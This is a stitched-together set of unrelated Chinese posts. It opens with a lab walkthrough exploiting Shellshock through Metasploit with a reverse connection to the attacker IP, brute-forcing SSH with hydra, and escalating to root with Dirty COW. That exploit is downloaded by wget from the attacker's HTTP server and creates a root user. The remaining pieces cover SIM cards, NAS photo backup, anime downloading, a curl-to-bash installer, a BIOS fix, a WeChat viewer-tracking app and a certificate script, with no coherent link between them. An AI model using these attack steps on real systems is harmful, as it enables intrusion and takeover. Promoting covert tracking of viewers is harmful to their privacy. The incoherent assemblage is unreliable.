总结

getwebshell : nikto扫描 → 发现shellshock漏洞 → 漏洞利用 → getwebshell

提 权 思 路 : 内网信息收集 → 内核版本较老 →脏牛提权

准备工作

启动VPN
获取攻击机IP → 192.168.45.194

启动靶机
获取目标机器IP → 192.168.190.87

信息收集-端口扫描

目标开放端口收集

• Nmap开放端口扫描2次(多次扫描减少误扫)

sudo nmap --min-rate 10000 -p- 192.168.190.87
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

开放的端口->22,80

目标端口对应服务探测

# tcp探测
sudo nmap -sT -sV -O -sC -p22,80 192.168.190.87
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))

信息收集-端口测试

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用
通过Nmap探测获得SSH的版本信息，可以尝试利用
探测版本为OpenSSH 5.9p1 Debian 较老

# 搜索对应脚本
msf6 > searchsploit OpenSSH 5.9p1

发现搜索到可利用的和用户枚举有关（待定）

22-SSH协议支持的登录方式
通过Nmap探测获得SSH的版本信息，在获取到某个用户名之后尝试
sudo ssh root@192.168.190.87 -v
显示publickey、password就是支持密钥以及密码登录

22-SSH手动登录尝试(无)
因为支持密码登录，尝试root账户的密码弱密码尝试

sudo ssh root@192.168.190.87 -p 22
# 密码尝试
password > root

弱密码尝试失败

22-SSH弱口令爆破(静静等待)
因为支持密码登录，尝试root账户的密码爆破，利用工具hydra，线程-t为6

sudo hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.190.87 ssh -s 22

挂着工具进行爆破，我们尝试后续信息收集

80-HTTP端口的信息收集
访问 http://192.168.190.87:80 不是CMS我们直接从HTML隐藏信息收集开始
提示是存在启动的应用，但是没显示

**信息收集-HTML隐藏信息查看
**

# 包括文章中是否写明一些敏感信息
curl http://192.168.190.87:80

无

信息收集-目录扫描

信息收集-目录扫描初步

# 用两个扫描器进行扫描，更加的谨慎一些
dirsearch -u http://192.168.190.87:80 -x 302,403,404
dirb http://192.168.190.87:80

没有扫出目录，准备大字典

信息收集-目录扫描(深度/大字典)

gobuster dir -u http://192.168.190.87:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 1000

在进行大字典的时候，发现无事可干，尝试利用其他工具探测一下web

探测完毕，毫无头绪

漏洞探测-nikto扫描

nikto -h http://192.168.190.87:80

探测之后提示似乎容易受到shellshock漏洞攻击CVE-2014-6278
似乎与首页的提示存在启动的应用有关

漏洞利用-getwebshell

Shellshock漏洞于2014年9月公开，并且对网络安全造成了相当大的影响。这个漏洞的本质是Bash解释器在处理环境变量时存在一种缺陷，允许远程攻击者通过精心构造的恶意环境变量注入任意的Shell命令，从而实现执行恶意代码的能力。

Shellshock攻击

使用msfconsole，搜索攻击方式

msfconsole
search CVE-2014-6271

在这里选择了1因为探测出来是apache的站点，1比2更靠谱
使用msf漏洞利用模块：exploit(multi/http/apache_mod_cgi_bash_env_exec)

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set rhosts 192.168.190.87
set lhost 192.168.45.194
set targeturi /cgi-bin/test
run

成功getwebshell

内网遨游-getshell

交互shell

交互shell-python

由于获取的shell交互不友好，利用python获得新的交互shell

# 如果是msf的要先shell
shell
# 利用python获取交互shell -> python失败使用python3
python -c "import pty;pty.spawn('/bin/bash')";

FLAG1获取

www-data@ubuntu:/usr/lib/cgi-bin$ find / -name local.txt 2>/dev/null
/usr/lib/cgi-bin/local.txt
www-data@ubuntu:/usr/lib/cgi-bin$ cat /usr/lib/cgi-bin/local.txt
6b8bdd93e00d8ea52fcc7f201eba9f56

信息收集-内网基础信息收集

提权的本质在于枚举，在获取shell之后我们要进行内网信息的收集，都是为了提权做准备

检测Linux操作系统的发行版本
较老的Ubuntu以及Linux系统可以overlayfs提权

# 确定发行版本
www-data@ubuntu:/usr/lib/cgi-bin$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 12.04 LTS
Release:        12.04
Codename:       precise

发行版本为Ubuntu 12.04，有点能overlayfs提权

检测Linux操作系统的内核版本
较低的内核版本可以进行脏牛提权

www-data@ubuntu:/usr/lib/cgi-bin$ uname -a
Linux ubuntu 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

内核版本为3.2.0

权限提升

overlayfs提权(无)

若存在以下情况进行overlayfsLinux Kernel Version提权

:-: |:-:
系统|版本
Linux Kernel Version |大于3.13.0小于3.19
Ubuntu|Linux 15.04
Ubuntu|Linux 14.10
Ubuntu| Linux 14.10
Ubuntu| Linux 12.04

msfcontrol

msf > searchsploit overlayfs

发现内核版本不太符合

脏牛提权尝试1(失败)

若存在以下情况进行脏牛提权

:-: |:-:
系统|版本
Centos7/RHEL7| 3.10 .0-327.36.3.e17
Cetnos6/RHEL6 |4.4.0-45.66
Ubuntu 16.10 |2.6.32-642 .6.2.e16
Ubuntu 16.04 |4.8.0-26.28
Ubuntu 14.04 |3.13.0-100.147
Debian 8 |3.16.36-1+deb8u2
Debian 7 |3.2.82-1

msf6 > searchsploit dirty

# cp到本地
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp .
# 确认编译语句
cat 40847.cpp

得到编译以及执行的语句

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow -s

python3开启http服务

# 利用python开启http服务，方便目标机器上下载文件
sudo python3 -m http.server 80
# 目标机器到tmp目录下下载(有下载权限)
cd /tmp
# 下载
wget http://192.168.45.194/40847.cpp
# 给权限
chmod +x 40847.cpp
# 编译
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
# 运行
./dcow -s

发现不能用g++`

脏牛提权尝试2

尝试换一个

# cp到本地
cp /usr/share/exploitdb/exploits/linux/local/40839.c .
# 确认编译语句
cat linux/local/40839.c

gcc -pthread dirty.c -o dirty -lcrypt
创建firefart用户，密码自输

python3开启http服务

# 利用python开启http服务，方便目标机器上下载文件
sudo python3 -m http.server 80
# 目标机器到tmp目录下下载(有下载权限)
cd /tmp
# 下载
wget http://192.168.45.194/40839.c
# 给权限
chmod +x 40839.c
# 编译
gcc -pthread 40839.c -o dirty -lcrypt
# 运行
./dirty

# 重新登录su firefart用户密码123456
www-data@ubuntu:/usr/lib/cgi-bin$ su firefart
Password: 123456
firefart@ubuntu:/usr/lib/cgi-bin# id
uid=0(firefart) gid=0(root) groups=0(root)

提权成功

FLAG2获取

firefart@ubuntu:/tmp# cat /root/proof.txt

22f3656d21fb5ef444ea898e69073476

总结

从发现ssh版本开始就感觉有点偏老，应该多尝试老漏洞

有时候nikto工具也可以适当用一下，指不定有其他收获

giffgaff 是来自英国的一家新锐低成本运营商，隶属于英国三大运营商 O2 旗下，2009 年创立，采用了无营业网点，无热线客服，灵活套餐的特色服务来降低用户成本，特别适合短期游客及英国留学生。它支持全球漫游，在中国也可收发短信，接听电话和上网。

为什么选择英国 giffgaff SIM 卡？

-性价比高：0 月租，免费接收短信，充值一次，接码可以用 20 年以上（仅需半年保号一次），可能是国内性价比最高的接码实体卡！
-安全：实体卡无须担心因号码被风控，还可以换 2 次号码，比 Google Voice 整天被风控来的好用
-漫游：支持中国大陆激活及漫游
-稳定性高：无限有效期，每半年发一条短信即可保号
-兼容性好：支持绝大部分海外 APP/应用/银行，例如 TikTok/Twitter/Facebook/Instagram/LINE/WhatsApp/Telegram 等等，ChatGPT3.5/4.0 ，苹果 ID ，Amazon ，PayPal ，花旗，渣打，巴克莱，德意志银行，瑞士银行，还有一些新出现的虚拟信用卡等等

常见坑汇总（不定期更新）

Q：官网申请到的空白卡里有话费吗？
A：没有，收到卡后按照教程自助激活，保姆级教程地址： https://pan.baidu.com/s/1Byhw7zE5MKNxaILy9d_Pcw?pwd=xkns

Q：充值送 5 磅话费的福利一直有吗？
A：直接官网在线申请的，目前此项福利已经取消。可以通过朋友邀请链接申请才有，或者自行购买。不激活不充值是没有的哦，超时充值也有可能没有错过福利哦。

Q：月租多少钱？
A：若和我一样，主要是用来接码，建议选择 0 月租的 Pay As You Go 套餐，充多少用多少，TB 或 JD 上卖的都是针对游客的短期月租套餐卡，不合适长期使用。如果您需要前往海外，只需到官网上调整您的套餐即可。

Q：如何保号，成本多少？
A：这种 O 月租的卡一般都有保号要求，giffgaff 要求每 180 天话费余额需要变动一次，否则号码会被回收。在国内，最低成本就是发出一条短信，发送对象是国内外手机号码均可以，每条 0.3 磅，因此一年消费 0.6 磅，仅仅不到 6 元人民币。每次话费余额变化后，例如充值，消费，保号周期重新开始计算。首次充值，也属于余额变动，因此在 180 天内完成保号即可。

Q：收短信免费吗，其他费用如何？
A：收短信免费，打电话/接电话=1 英镑/分钟，发短信=0.3 英镑/条，上网=0.2 英镑/MB

Q：首次自助充值激活需要准备什么？
A：请准备一张 VISA 或万事达的外币实体信用卡或借记卡，国内发行的也可以，单银联、JCB 、AE 等信用卡以及任何虚拟信用卡均无法使用哦，充值最低 10 英镑起，请确保您的卡额度足够。特别提醒，首次充值不支持 PayPal ，以后续费可以使用。

Q：插卡后没信号
A：由于海外运营商与国内运营商之间的漫游对接有很多环节和验证过程，耐心等待 1-5 分钟， 就会出现。

Q：我的卡号是多少
A：首次插卡，会收到一条激活成功的提示短信，内有您的手机号码，后面也可以登录官网查询。

Q：手机号码正确，无法登录官网或软件提示号码格式不对
A：英国国际区号(United Kingdom)是+44 ，有时候也用 0044 表示，输入时候要选择正确区号。

Q：为什么我的卡无法拨打电话，无法发短信？
A：可以在手机设置里取消 [运营商自动选择] ，改为手动选择到中国移动，并重启手机后再尝试

Q：支持哪些手机？信号如何？
A：支持目前所有主流手机，gg 卡是 FDD-LTE 制式，除了极少数电信 CDMA 3G 手机不支持，其他均无问题。它在国内默认通过中国移动或中国联通进行漫游，还支持 5G ，通话质量，数据质量，覆盖范围非常不错。

Q：苹果手机使用上有什么注意事项？
A：不建议打开 iMessage/Facetime 功能，因为如果点击确认，苹果后台会发出一条短信，因此会被扣费 0.3 磅。由于国内短信价格很低，很多人都是套餐里送的，所以不知道有这么一个短信发送的过程。

giffgaff 常用功能

首次充值激活：
登录个人账户/重置密码：
查询话费余额/SIM 号码：
续费充值：
话费账单查询：
个人资料修改：
申请换号： （一般在被 app 封号后建议用，有 2 次额度）

查询 SIM 号码：发送 [ NUMBER ] 到 43430
查询话费余额：直接拨打 [*100#]
关闭语音信箱：直接拨打 [##002#]
打开语音信箱：直接拨打 [*614431020#]

使用 giffgaff （ gg ）卡注册各类 app 遇到的坑

Q：为什么收不 Telegram 电报的验证码？
A：请使用 Telegram 移动端申请注册，网页端及电脑客户端是不行的。如果还不行，大概率是因为你使用的是国内阉割版的安卓手机，TG 的安卓版需要手机系统内置谷歌服务框架 GMS 软件包才能收到验证码，建议更换苹果手机，或者带 GMS 服务的安卓手机，具体请百度谷歌查询。

Q：为什么收不到 Line 的验证码？
A：Line 近期已经加强了防欺诈能力，无论你用什么运营商的海外号码申请注册，凡是通过机场/VPN 这种共享 IP 来使用，大概率会被识别出来，看似没有任何报错，就是收不到验证码。解决方案是开启 gg 卡自带的漫游上网来完成所有注册流程，同时建议暂时关闭其他 App 的网络访问，避免消耗流量。

Q：为什么收不 Tik Tok 国际版抖音的验证码？
A：确保您的卡和 App 在同一部手机，其次确保手机里就一张 gg 卡，国内卡不能同时存在，最后建议更换 VPN 或机场线路，比如切换到美国/日本/新加坡/英国等地，港台线路容易受污染。

为什么要存到 NAS

一直不愿意用一些云相册或者网盘之类的服务来备份和保存自己的照片,主要是两个原因:

1. 不想自己的隐私被这些服务方一直视奸,你传上去的照片视频肯定会被这些服务方扫描一遍的,就算没有私密的照片,我也接受不了隐私被这样侵犯
2. 不想自己的数据被绑架,毕竟数据是别人手上,哪天别人要跑路或者涨价,你也没有任何办法

尝试的方案

群晖 moments
最开始 NAS 装了群晖,于是就用了群晖自带的 moments 来同步照片.用了一段时间后出现了一些问题:

1. moments app 几乎不再更新,体验不算差,但绝对不好,老婆总是抱怨 ios 上这不好用那不好用
2. 与群晖绑定,因为必须搭配 moments 服务端一起使用,所以你没有任何别的选择,这让我感觉很被动
   现在似乎群晖已经淘汰 moments 了,出了新的群晖 photos,这个我没有试用过,因为群晖硬件还是太贵了,现在已经改用 Unraid 了

PhotoPrism - 超好用
不得不说 PhotoPrism 确实太好用了,我最喜欢它的一点是他的兼容性很强,你只要丢给它一个目录,他就能处理里面的所有照片,并且可以在各个维度进行检索,对于超大量的照片来说真的很好用.

但问题就在于 PhotoPrism 只有服务端,把照片同步到 NAS 这个动作还要我自己想办法来完成

PhotoSync - 不值得这个价格
这个 app 的功能还是可以的,但是它的 UI 和交互是在是有点古老,我还需要专门用一个 app 来进行同步这个事情,最重要的是要付费才能用,我觉得不太值得,放弃.

Nextcloud - 移动端 app 太差
Nextcloud 作为网盘来说挺好用的,我尝试使用 Nextcloud 的移动端来同步相册照片.但我真的安装了安卓端 app 后,连接了我 https 反代后的 URL 居然直接崩溃了,完全没法用,放弃.

Alist + Pho + Rclone + PhotoPrism - 终极方案

这个方案最让我喜欢的一点是各个环节都不是耦合的,去掉其中任何一个环节都不会影响到其他环节,每个人完全可以根据自己的喜好来替换其中的某个部分.

Alist
官网: https://alist.nn.ci/zh/
负责把各种可用的储存映射成webdav,支持各种云盘网盘以及本地储存

Pho
官网: https://pho.tools/
负责通过webdav上传照片到Alist映射的储存 它很好的一点是支持加密后上传,这样就可以在网盘上做二次备份,在能避免隐私泄露的前提下多一层数据保险
而且我可以在手机上直接用这个 app 来浏览我本地和已经上传的照片,这个 app 的 UI 和交互都很好,可以直接用它来代替系统自带的相册

Rclone
官网: https://rclone.org/
负责把Alist的webdav映射到 NAS 的文件系统内,来把照片喂给 PhotoPrism

PhotoPrism
官网: https://www.photoprism.app/
最终的"集大成者",全家所有设备备份的照片最终全部喂到这里,即使是海量照片也能根据它快速索引到自己想找的照片

最终效果

平时手机上浏览和上传
使用Pho浏览本地和最近上传的照片

查找和浏览过去某个时候的照片
根据信息用PhotoPrism检索即可

流行的开源代码编辑器 Notepad++ 发现了多个缓冲溢出漏洞，允许攻击者执行任意代码。Notepad++ 尚未发布补丁修复漏洞。GitHub Security Lab 的安全研究员 Jaroslav Lobačevski 发现，Notepad++ 使用的部分函数和库存在堆缓冲区写溢出和堆缓冲区读取溢出漏洞，这些漏洞的风险评分从 5.5 （中危）到 7.8 （高危）不等。他是在四月底报告了漏洞，但直到 Notepad++ 发布最新版本 v8.5.6 漏洞仍然没有修复，因此根据披露政策公开了漏洞和 PoC 。

https://cybersecuritynews.com/multiple-notepad-flaw/

https://securitylab.github.com/advisories/GHSL-2023-092_Notepad__/#resources

smart-doc 是一款同时支持 JAVA REST API 和 Apache Dubbo RPC 接口文档生成的工具，smart-doc 利用接口泛型和 javadoc 注释自动分析生成 api 接口文档，不采用任何注解侵入到业务代码中。只需要在项目中引入 smart-doc 提供的 maven 或者是 gradle 插件，然后按照规范写好 javadoc 注释即可生成 api 文档。同时 smart-doc 也支持生成 openapi 和 postman 这些规范的文档，生成后可以直接导入相关工具做测试。

Features

• 零注解、零学习成本、只需要写标准 JAVA 注释。
• 基于源代码接口定义自动推导，强大的返回结构推导。
• 支持 Spring MVC 、Spring Boot 、Spring Boot Web Flux(controller 书写方式)、Feign 。
• 支持 JAX-RS 实现的 WEB 框架，例如 Quarkus 。
• 支持 Callable 、Future 、CompletableFuture 等异步接口返回的推导。
• 支持 JavaBean 上的 JSR303 参数校验规范，包括分组验证。
• 对 JSON 请求参数的接口能够自动生成模拟 JSON 参数。
• 对一些常用字段定义能够生成有效的模拟值。
• 支持生成 JSON 返回值示例。
• 支持从项目外部加载源代码来生成字段注释(包括标准规范发布的 jar 包)。
• 支持生成多种格式文档：Markdown 、HTML5 、Asciidoctor 、Postman Collection 、OpenAPI 3.0 。Up- 开放文档数据，可自由实现接入文档管理系统。
• 支持导出错误码和定义在代码中的各种字典码到接口文档。
• 支持 Maven 、Gradle 插件式轻松集成。
• 支持 Apache Dubbo RPC 接口文档生成。

更新内容

1. 优化 smart-doc 常量获取，支持静态导入的常量获取。
2. 无源代码第三方接口范型方法的解析支持，
3. 生成 Mardown 代码块添加语言类型支持，
4. 修复 openapi 生成 summary 和 description 设置，
5. 修复生成的 openapi.json 中接口的路径参数赋予 format 错误,

发展情况

smart-doc 开源维护接近五年，目前很多功能已经非常稳定，国内有很多的用户。码云 star 3k+，github star 1k+ 。smart-doc 官方布道的企业级文档管理系统 torna 的 docker 镜像下载量超过 10k 。国内已有数家知名司在使用 smart-doc ，如：科大讯飞、小米、一加、顺丰、马蜂窝、同程旅行等。smart-doc+torna 的整套 API 管理体系已经被很多公司落地使用。smart-doc 目前也是 java 领域国内除了 swagger 外被使用最多的 API 文档生成工具，覆盖的用例最前全面，最新的版本几乎不易在使用中报错。

仓库地址

https://github.com/smart-doc-group/smart-doc

背景

众所周知，目前国内想要看日漫的话，除了B站引进的动漫之外。其他的都是得自己去找途径。而在B站看番还得等过审。相对来说又是一个不足。所以很多人转向了其他网站或者通过磁力链接之类的。而这些没有国内资质的网站很容易倒闭，而且很多时候为了成本考虑他们会尽可能的压缩视频的画质，导致观看体验较差。而BT下载相对来说资源不用愁，但是得自己去下载。对于手机用户或者对BT不熟悉的人可能会有一定的门槛。

目前有一个开源追番系统——AutoBangumi

这个项目是基于 Mikan Project、qBittorrent 的全自动追番整理下载工具。只需要在 Mikan Project 上订阅番剧，就可以全自动追番。并且整理完成的名称和目录可以直接被 Plex、Jellyfin 等媒体库软件识别，无需二次刮削。所以我们可以通过一次搭建彻底解决看番烦恼。

准备

一台服务器/NAS/电脑

一枚蜜柑账号（已被墙）CN站点：Mikan Project CN

服务器我这里选择的是腾讯云的轻量服务器。个人推荐是买海外地区的。比如新加坡、硅谷、东京这几个地区，这几个地区的服务器线路相对较好。当然如果对价格不敏感的话也可以选择香港地区或者买带宽超过7M的境内服务器

国内服务器带宽小但是胜在稳定。7M的带宽可以覆盖绝大部分的动漫的码率。

蜜柑账号就直接注册一个即可。然后在账号设置中打开高级订阅。

注册完成之后我们需要RSS订阅自己想要看的番剧。订阅可以选择订阅该番剧的全部资源/指定字幕组/指定语言。

下图为示例图：①代表订阅全部资源 ②订阅该发布组的资源可选③简中、繁中、全部

目前出种速度上大部分都是巴哈上播放之后10分钟以内就有内嵌繁中的web源，而简中资源一般会1-7天内出，冷门番剧的话可能没有中文字幕。我个人是喜欢先看繁中资源，剧情要是好看的话就等简中资源出来再看一遍。

订阅之后就会显示如下图标。

此时点击首页最上方菜单栏的订阅就可以看到订阅的番剧了，RSS订阅则是我们接下来要用到。格式如下

AutoBangumi中需要的token就是token=后面的一串字符

https://mikanani.me/RSS/MyBangumi?token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# 或者
https://mikanime.tv/RSS/MyBangumi?token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

AutoBangumi 部署

部署程序非常简单，我这里以2c2g的硅谷debian服务器作为演示，进入控制台，先登录指定服务器。可以先在服务器防火墙安全组开放后面需要用到的端口号：7892

安装Docker

先更新软件源：

sudo apt update -y && sudo apt upgrade -y

使用官方的安装脚本：

curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh

创建数据和配置文件夹

为了保证 AB 在每次更新之后数据和配置不丢失，推荐使用 Docker volume 或者 bind mount 进行数据和配置的持久化。下列操作可以通过sudo su命令切换到 root 用户进行操作

# 使用 Docker volume
docker volume create AutoBangumi_config
docker volume create AutoBangumi_data
​
# 使用 bind mount
mkdir "AutoBangumi"
cd "AutoBangumi"
mkdir -p $PWD/config
mkdir -p $PWD/data

使用 Docker-cli 部署 AutoBangumi

复制以下命令运行即可。

docker run -d \
  --name=AutoBangumi \
  -v AutoBangumi_config:/app/config \
  -v AutoBangumi_data:/app/data \
  -p 7892:7892 \
  --network=bridge \
  --dns=8.8.8.8 \
  --restart unless-stopped \
  estrellaxd/auto_bangumi:latest

如果使用 bind mount，可以自行替换绑定路径。

此时 AB 的 WebUI 会自动运行，但是主程序会处于暂停状态，可以进入 http://abhost:7892 进行配置。

此时 AB 会自动把环境变量写入 config.json 文件中然后自动运行。

推荐使用 Portainer 等带有 UI 的 Docker 管理器进行进阶部署

Qbittorrent安装

我们这里安装的是4.3.9版本

cd /root
wget https://github.com/userdocs/qbittorrent-nox-static/releases/download/release-4.3.9_v1.2.15/x86_64-qbittorrent-nox
chmod +x x86_64-qbittorrent-nox
./x86_64-qbittorrent-nox 

输入y就可以安装了，然后CTRL+C退出

默认登录的用户名和密码为admin adminadmin，登陆地址为公网IP:8080。

把下列代码整体复制粘贴到命令行。让qbittorrent可以作为服务长久运行。

cat << "EOF" > /etc/systemd/system/qbittorrent.service
[Unit]
Description=qBittorrent Daemon Service
After=network.target
​
[Service]
LimitNOFILE=512000
User=root
ExecStart=/root/x86_64-qbittorrent-nox
​
[Install]
WantedBy=multi-user.target
EOF

更新并启动服务

# 更新配置
systemctl daemon-reload
# 启动服务
systemctl start qbittorrent
# 查看状态
systemctl status qbittorrent
# 重启服务
systemctl restart qbittorrent

登录qb的webui页面进行配置并且进行重启服务

配置AutoBangumi

输入服务器的 公网IP:7892进入webUI页面默认的用户名为：admin 密码为adminadmin，务必第一时间修改密码！

进入设置页面，首先修改下载设置

qb的地址改为公网地址，密码改成修改后的密码

然后修改解析器,填入之前在蜜柑获取的token，把解析器类型改为蜜柑即可。最后再进行应用

应用之后就可以再qb界面看到下载资源了

可以看到我们订阅的番剧了

在线播放

如果要实现在线播放有几种方法。

1、优雅的emby、plex、jellyfin媒体管理程序

都是优秀的媒体管理程序，直接适配，不需要再进行搜刮。

2、直接搭建一个服务器的文件浏览器。直接看。没啥美感，但是极致的简单

这里介绍一下建一个Emby的服务器。

直接进入官网下载页面按照教程即可。

https://emby.media/linux-server.html

wget https://github.com/MediaBrowser/Emby.Releases/releases/download/4.7.13.0/emby-server-deb_4.7.13.0_amd64.deb
dpkg -i emby-server-deb_4.7.13.0_amd64.deb

完成后打开公网IP:8096 ，打不开先看看防火墙规则是否开放了8096端口。

进入配置页面,设置一下管理员账号、语言以及qb的下载文件夹即可

完成之后登录就可以看到啦

然后把emby的地址填入AutoBangumi的media player Setting里即可

最后的效果。

使用方法

打开终端后执行以下命令即可自动安装

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/wy-luke/StableDiffusion-Installer-For-Mac/main/sd-installer.sh)"
当然，网络原因可以使用以下命令，但是后续安装可能也会由于网络原因失败，建议先保证网络通畅

/bin/bash -c "$(curl -fsSL https://raw.fastgit.org/wy-luke/StableDiffusion-Installer-For-Mac/main/sd-installer.sh)"

更详细的使用说明可以看这里

特性

1. 使用 Homebrew 安装一些系统依赖
2. 使用 Micromamba 作为 Python 包和环境管理工具。和 Conda 比起来，没有 Base 环境（为空），所以丝毫不会影响你的系统环境，而且更快。
3. Homebrew 和 Micromamba 均不会被添加到你的系统环境中，保证你的系统清爽如初。
4. 项目开源，欢迎提出问题，讨论分享，欢迎 Star ⭐️ ~~~

联想台式机 启天M610更新BIOS导致黑屏报错，Machine Type or Serial Number is INVALID；最后进不了系统的解决方案

联想台式机，升级BIOS过程中，需要更新【实际上是重新填写】两个数据：

1， Machine type and model info，机器类型和型号信息，

    其中机器类型是4个数字+字母构成；型号信息是6个数字+字母构成
    aida//系统概述//，前者+后者标一起注为【DMI系统产品】
    在买电脑时附带的 装箱信息单上面也有，标注为【商品编号】

2, System serial Number，系统序列号，为8位数的数字+字母表示；

    adia//系统概述//【DMI系统序列号 or DMI主机序列号】
    在买电脑时附带的 装箱信息单上面也有，标注为【出厂编号】

3，这些数据，在BIOS无重大异常，可以进入桌面系统，或winpe系统时，运行aida软件即可得到；

    或者是，找到买电脑时的装箱信息单//装箱清单，上面是有的；
    或者是，在主机箱的侧面注意查找，有时候也是有的（有时候不提供，联想也确实是挺坑的）

联想台式机，升级BIOS要慎重，不管他提示什么BIOS版本低还是有安全隐患怎么的，系统的稳定性才是第一位的。

个人就是吃了这个大亏，从出厂附带的bios（2017年的），莫名的升级为了2023年的版本，升级过程，提示是否需要更新下面这连个信息，个人选择不更新（默认不应该是使用原先的对应信息吗？），可是重启之后就提示：

Error ooCE: Machine Type or Serial Number is INVALID
Manufacturing boot Sequencing will be taken if no selection is made.
刚开始还能够进入系统，但是每次开机报错，出现上面的错误提示，同时响两声，后来连系统都进不去了；

于是乎，尝试了回复之前的映像，问题未解决；
于是乎，尝试了重装系统，结果原先的系统盘无法直接安装，格式化了之后还是一样；
于是乎，网上各种查找尝试，有效的方案很少；最后自己向明变了，既然是BIOS信息错误，那必然是刷的BIOS是不合适的，还是要通过刷BIOS来挽救。

于是乎，准备好了对应机型的最新版BIOS程序，和下面的两组数据（主机类型和型号//主机序列号），进入win10pe X64版，在pe环境下直接运行BIOS更新程序，过程中选了更新这两组信息，并输入；刷完BIOS之后重开机，没有报错；

于是乎，重新安装系统，安装软件，重新激活等等；总共耗时一下午+半晚上+一早上，终于搞定。

总结起来一句话，联想这坑太深，谨慎更新BIOS，以免得不偿失。

理想做法是，更新系统前先准备好这两组数据【可是没掉过坑的人又怎么回去准备呢？】；
或是首次出现黑屏报错时，
1）进入系统以后，即使重新刷BIOS，且更新合适的机型及主机序列号信息【估计能想到这一步的，也是曾经掉进过这个坑里的人】；
2）及时借助winpe系统冲刷BIOS

AIDA64 EXTREME//计算机//系统概述，找到右边窗口下方的 DMI信息 部分；
DMI
DMI BIOS 厂商 LENOVO
DMI BIOS 版本 【马赛克】
DMI 系统制造商 LENOVO
DMI 系统产品 90FY*1WW 【马赛克】
DMI 系统版本 QiTianM6-D*
DMI 系统序列号 M*X4
DMI 系统 UUID 807CE73F--81ADDADE- 【马赛克】
DMI 主板制造商 LENOVO
DMI 主板产品 3107
DMI 主板版本 NOK
DMI 主板序列号
DMI 主机制造商 LENOVO
DMI 主机版本 无
DMI 主机序列号 M905** 【马赛克】

朋友圈访客记录查询教程
如何查看微信朋友圈访客记录的方法?下载悄悄朋友圈APP

1. 下载登录后使用
2. 发布动态
3. 分享到微信朋友圈如果有人看了你的朋友圈,就会在通知你 可以点下首页看看谁看了你的朋友圈哦
   原理就是发一个类似笔记一样的动态，不管对方和你是不是好友，只要通过朋友圈点开了，点开的时间点和次数以及停留时间就会被统计。

贴上自己写的自动更新 ssl 证书脚本，以便帮助有需要的人。 ps：

1. 这个脚本工作于我的 dsm6.2 ，如果是 dsm7 ，你可能需要更改下证书存放路径和服务重启方式（自己找找相关信息，思路是一样的）
2. 由于运营商封 80 端口，所以不能使用 http challenge ，只能使用 dns challeng 。这个脚本使用的是 acme.sh 的 cloudflare 的 api ，如果要改成其它提供商如阿里云，请参考 acme.sh 相关文档，切换应该也很简单

#!/bin/bash

# Automatically update certs for Synology DSM6
# 1. Migrate your domain to Cloudflare, and create an A type record.
# 2. Generate a token with zone view authority and dns edit authority.
# 3. Install acme.sh on DSM6, no need crontabs: ./acme.sh --install --force -m my@example.com
# 4. Put this script into user defined task scheduler, executes per one month or two.
# 5. Make sure this script will be exectuted once immediately by your schedule task, or just execute it once mannually.

# Modify these as your own.
# See https://github.com/acmesh-official/acme.sh/wiki/dnsapi#using-the-new-cloudflare-api-token-you-will-get-this-after-normal-login-and--scroll-down-on-dashboard-and-copy-credentials
export CF_Account_ID="xxx"
export CF_Zone_ID="xxx"
export CF_Token="xxx"
DOMAIN_RECORD='example.com'

ACME_HOME=$HOME/.acme.sh
ACME_SH=$ACME_HOME/acme.sh

if ! command -v "$ACME_SH" &>/dev/null; then
    echo "Please install acme.sh."
    exit 1
fi

DOMAIN_CERT_HOME="$ACME_HOME/$DOMAIN_RECORD"

TARGET_DIRS=(
    "/usr/syno/etc/certificate/_archive/$(head -n1 /usr/syno/etc/certificate/_archive/DEFAULT | xargs echo -n)"
    '/usr/syno/etc/certificate/system/default'
    '/usr/syno/etc/certificate/smbftpd/ftpd'
    '/usr/local/etc/certificate/CardDAVServer/carddav'
    '/usr/local/etc/certificate/SynologyDrive/SynologyDrive'
    '/usr/local/etc/certificate/WebDAVServer/webdav'
)

issue_or_renew() {
    cert_issued=0
    domains=()
    while IFS='' read -r line; do domains+=("$line"); done < <($ACME_SH --list | awk '{print $1}')
    for domain in "${domains[@]}"; do
        if [ "$domain" = "$DOMAIN_RECORD" ]; then
            cert_issued=1
            break
        fi
    done
    if [ "$cert_issued" -eq 0 ]; then
        rm -rf "$DOMAIN_CERT_HOME"
        # Issue certs via zerossl, or via letsencrypt you'd have to update ca-certificates on DSM6.
        # Since DSM6 does not support ecc, rsa(-k) should be specified, or system default certs will be overridden by DSM6 when reboots.
        $ACME_SH --issue --server zerossl --dns dns_cf -d $DOMAIN_RECORD -k 2048
    else
        $ACME_SH --renew --force -d $DOMAIN_RECORD
    fi
}
copy_certs() {
    echo "Copying certs...."
    for dir in "${TARGET_DIRS[@]}"; do
        install -m 400 "$DOMAIN_CERT_HOME/$DOMAIN_RECORD.cer" "$dir/cert.pem"
        install -m 400 "$DOMAIN_CERT_HOME/$DOMAIN_RECORD.key" "$dir/privkey.pem"
        install -m 400 "$DOMAIN_CERT_HOME/fullchain.cer" "$dir/fullchain.pem"
    done
    echo "Certs copy completed."
}

restart_services() {
    echo "Restarting services...."
    nginx -s reload
    /var/packages/WebDAVServer/scripts/start-stop-status stop
    /var/packages/CardDAVServer/scripts/start-stop-status stop
    sleep 20
    /var/packages/WebDAVServer/scripts/start-stop-status start
    /var/packages/CardDAVServer/scripts/start-stop-status start
    /var/packages/SynologyDrive/scripts/start-stop-status restart
    echo "Services restart completed."
}

